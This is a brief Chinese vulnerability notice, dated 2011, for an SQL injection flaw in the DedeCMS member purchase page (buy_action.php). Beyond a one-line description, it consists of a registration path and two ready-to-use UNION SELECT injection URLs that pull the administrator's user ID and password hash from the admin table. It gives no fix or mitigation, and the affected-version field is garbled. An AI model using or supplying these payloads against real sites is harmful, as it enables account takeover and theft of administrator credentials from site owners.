DedeCMS 支付页面注入漏洞

发布日期：2011-03.23
发布作者：佚名
影响版本：dodecms.
官方网站：http://www.dedecms.com
漏洞类型：SQL注入
漏洞描述：DedeCMS. 织梦buy_action.php存在注入，可利用SQL查询代码爆管理员用户密码。
漏洞测试：
首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew
爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*